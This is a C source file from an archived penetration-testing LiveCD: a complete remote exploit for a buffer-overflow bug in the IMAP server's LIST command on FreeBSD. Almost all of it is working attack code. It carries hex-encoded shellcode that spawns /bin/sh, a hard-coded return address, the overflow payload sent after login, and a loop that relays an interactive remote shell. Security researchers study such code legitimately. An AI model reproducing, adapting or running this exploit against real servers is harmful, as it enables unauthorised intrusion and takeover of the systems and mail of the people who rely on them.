home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Chip 2007 January, February, March & April
/
Chip-Cover-CD-2007-02.iso
/
Pakiet bezpieczenstwa
/
mini Pentoo LiveCD 2006.1
/
mpentoo-2006.1.iso
/
livecd.squashfs
/
opt
/
pentoo
/
ExploitTree
/
application
/
mail
/
imapd
/
imaper.c
< prev
next >
Wrap
C/C++ Source or Header
|
2005-02-12
|
5KB
|
214 lines
//
// imapd sploit
// [ list/lsub vulnerability ]
//
// eggcode:
// freebsd
//
// default valuez for target:
// freebsd4.0-rel + imap4rev1 2000.278
//
// coder:
// p0kem0n / kidz team
// email:
// <p0kem0n@hotbox.ru>
//
// comments:
// i am a lazy shit. so there isn't userfriendly
// command line i-face.
//
// p.s.: no errors checking
//
// greetz to:
// all active members of [kidz team], dummYcube, mazz
//
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#define IMAP_PORT 143
#define FAT 512
#define BUF_SIZE 1024
#define LBUF 512
//#define DEBUG
#define LOGIN "uza" // don't forget to modify
#define PASSWORD "lapassworde"
char alien_egg[] = // idea of anathema. respect.
"\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3"
"\x51\x52\x53\x53\x6a\x3b\x58\xcd\x80\x66\x31\xc0\xcd\x80";
unsigned long body_addr = 0xbfbfeb68; // calibrate it for non default
//0xbfbfea4c - preauth mode
void alien_makeup(char* carrier, char* egg);
int arrive(char* hosty, int port);
int infect(int body, char* carrier);
void alien_work(int body);
int main(int argc, char** argv) {
char carrier[4*LBUF];
int payback;
int body;
printf(" [ %-11s ][ starting.... ]\n", argv[0]);
if(argc != 2) {
printf("\t\t[ error in parameterz! ]\n");
printf("\t\t[ you must specify host ]\n");
exit(1);
}
alien_makeup(carrier, alien_egg);
printf("\t\t[ alien maked ]\n");
printf("\t\t[ connect to %.32s.... ]\n", argv[1]);
body = arrive(argv[1], IMAP_PORT);
if(body < 0) {
printf("\t\t\t[ failed! ]\n");
exit(1);
}
printf("\t\t\t[ successful ]\n");
if((payback = infect(body, carrier)) < 0) {
printf("\t\t[ error sending carrier ]\n\t\t\t[ ");
switch(payback) {
case -1:
printf(" possibly connection error ]\n");
break;
case -2:
printf(" kid, there isn't such a bug! ]\n");
break;
case -3:
printf(" get correct password first! ]\n");
}
exit(1);
}
printf("\t\t[ INFECTED! ]\n");
printf("\t\t[ alien at work ]\n");
printf("\t\t\t[ begin ]\n");
alien_work(body);
printf("\t\t\t[ alien iz dead ]\n");
printf("\t\t[ end ]\n");
printf(" [ %-11s ][ session is over ]\n", argv[0]);
}
void alien_makeup(char* carrier, char* egg) {
memset(carrier, 0x90, 4*LBUF);
strncpy(carrier+FAT, egg, strlen(egg));
*(unsigned long*)(carrier+BUF_SIZE+4) = body_addr+FAT;
*(unsigned long*)(carrier+BUF_SIZE+8) = 0x00000a0a;
#ifdef DEBUG
printf(" [debug][ carrier: %s ]\n", carrier);
printf("\t[ carriersize: %hx ]\n", strlen(carrier));
printf("\t[ eggsize: %hx ]\n", strlen(egg));
printf("\t[ alien_addr: 0x%x ]\n", *(unsigned long*)(carrier+BUF_SIZE+4));
#endif
}
int arrive(char* hosty, int port) {
struct sockaddr_in way;
struct hostent *hp, *gethostbyaddr();
int sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock < 0)
return -1;
way.sin_port = htons(port);
way.sin_family = AF_INET;
hp = gethostbyname(hosty);
if(hp == NULL) {
close(sock);
return -1;
}
memcpy( &way.sin_addr.s_addr, hp->h_addr_list[0], hp->h_length);
if(connect(sock, (struct sockaddr*)&way, sizeof(way)) < 0) {
close(sock);
return -1;
}
return sock;
}
int infect(int body, char* carrier) {
int len;
char buf[LBUF];
memset(buf, 0, LBUF);
if(recv(body, buf, LBUF, 0) < 0) {
close(body);
return -1;
}
#ifdef DEBUG
printf(" // %s", buf);
#endif
sprintf(buf, "dead login "LOGIN" "PASSWORD"\n");
len = strlen(buf);
if(send(body, buf, len, 0) < len) {
close(body);
return -1;
}
memset(buf, 0, LBUF);
if(recv(body, buf, LBUF, 0) < 0) {
close(body);
return -1;
}
#ifdef DEBUG
printf(" // %s", buf);
#endif
if(strncmp(buf+5, "OK", 2) != 0) {
close(body);
return -3;
}
buf[0] = '\0';
sprintf(buf, "dead list \"\" {%d}\n", BUF_SIZE+8);
len = strlen(buf);
if(send(body, buf, len, 0) < len) {
close(body);
return -1;
}
len = strlen(carrier);
if(send(body, carrier, len, 0) < len) {
close(body);
return -1;
}
memset(buf, 0, LBUF);
if(recv(body, buf, LBUF, 0) < 0) {
close(body);
return -1;
}
#ifdef DEBUG
printf(" // %s", buf);
#endif
if((strncmp(buf+5, "BAD", 3) == 0)||(strncmp(buf+5, "OK", 2) == 0)) {
close(body);
return -2;
}
return 1;
}
void alien_work(int body) {
int len;
char buf[LBUF];
fd_set fds;
while (1) {
FD_SET(0, &fds);
FD_SET(body, &fds);
select(body+1, &fds, NULL, NULL, NULL);
if (FD_ISSET(0, &fds)) {
len = read (0, buf, LBUF);
if (len <= 0)
return;
write (body, buf, len);
}
if (FD_ISSET(body, &fds)) {
len = read (body, buf, LBUF);
if (len <= 0)
return;
write(1, buf, len);
}
}
}
/* www.hack.co.za [14 April 2001]*/
